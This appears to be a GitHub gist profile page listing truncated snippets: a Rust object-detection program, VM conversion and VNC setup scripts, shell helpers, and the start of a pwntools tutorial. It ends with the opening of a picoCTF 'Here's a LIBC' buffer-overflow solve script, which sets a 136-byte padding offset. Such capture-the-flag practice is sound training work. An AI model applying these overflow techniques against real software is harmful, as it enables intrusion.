Skip to content

Instantly share code, notes, and snippets.

View auser's full-sized avatar

Ari auser

View GitHub Profile
@auser
auser / imagedet.rs
Created August 18, 2025 04:17 — forked from a-agmon/imagedet.rs
Using graph-flow to identify object
use async_trait::async_trait;
use chrono::Local;
use graph_flow::{
Context, ExecutionStatus, FlowRunner, GraphBuilder, GraphStorage, InMemoryGraphStorage,
InMemorySessionStorage, NextAction, Session, SessionStorage, Task, TaskResult,
};
use image::{ImageBuffer, Rgb};
use minifb::{Key, Window, WindowOptions};
use nokhwa::{
pixel_format::RgbFormat,
#!/usr/bin/env bash
# untar the ova
tar -xvf [path-to-ova]
# Convert to qcow2
qemu-img convert -O qcow2 jangow\ 01-disk001.vmdk jangow.qcow2
# Create a new machine in UTM
# Select emulated
#!/usr/bin/env bash
declare -A Colors=(
[Color_Off]='\033[0m'
[Black]='\033[0;30m'
[Red]='\033[0;31m'
[Green]='\033[0;32m'
[Yellow]='\033[0;33m'
[Blue]='\033[0;34m'
[Purple]='\033[0;35m'
@auser
auser / run.sh
Last active April 9, 2024 17:21
#!/usr/bin/env bash
# Default configuration
IMAGE_NAME="auser/dev"
# Color definitions
declare -A Colors=(
[Color_Off]='\033[0m'
[Black]='\033[0;30m'
[Red]='\033[0;31m'
@auser
auser / clone-all.sh
Created December 19, 2023 16:55 — forked from zeekay/clone-all.sh
#!/usr/bin/env sh
repos='bridge bridge-react chat cli coreth dao docs exchange explorer faucet finance gsn indexer lattice lpm luxjs marketplace multiparty netrunner netrunner-sdk node oraclevm plugins-core safe safe-ios sites standard subnet-evm town ui vault vmsdk wallet zchain'
for r in $repos;
do git clone [email protected]:luxdefi/$r
done
# /etc/systemd/system/[email protected]
[Unit]
Description=Manage VNC Server on this droplet
After = syslog.target network.target
[Service]
Type=forking
PidFile = /home/auser/.vnc/%H:%i.pid
ExecPreStart=/usr/bin/tigervncserver -kill %i >/dev/null 2>&1
ExecStart=/usr/bin/tigervncserver -depth 24 -geometry 1920x1080 -localhost %i

Keybase proof

I hereby claim:

  • I am auser on github.
  • I am auser (https://keybase.io/auser) on keybase.
  • I have a public key ASAmUp6O5pKPPrq1HOrLDcA70zfA3gKBOo1NL-Oe3pGEvgo

To claim this, I am signing this object:

@auser
auser / index.html
Last active November 10, 2021 17:40
<html>
<head>
<title>My Post Secret</title>
</head>
<body>
<div id="app"></div>
<form>
<input type="text" name="name" />
</form>
</body>
@auser
auser / tutorial.txt
Created June 23, 2021 14:45 — forked from JamesMenetrey/tutorial.txt
PwnTools; example of usage
Source: https://tc.gts3.org/cs6265/2017/l/lab04/README-tut.txt
====================================
Lec04: Writing Exploits with PwnTool
====================================
http://docs.pwntools.com/
http://docs.pwntools.com/en/stable/intro.html
@auser
auser / pwner.py
Created June 13, 2021 12:38
picoCTF Here's a LIBC
#!/usr/bin/env python3
from pwn import gdb, log, p64, process, remote, u64
p = process('./vuln')
# p = remote('mercury.picoctf.net', 49464)
gdb.attach(p)
offset = 136
junk = b'A' * offset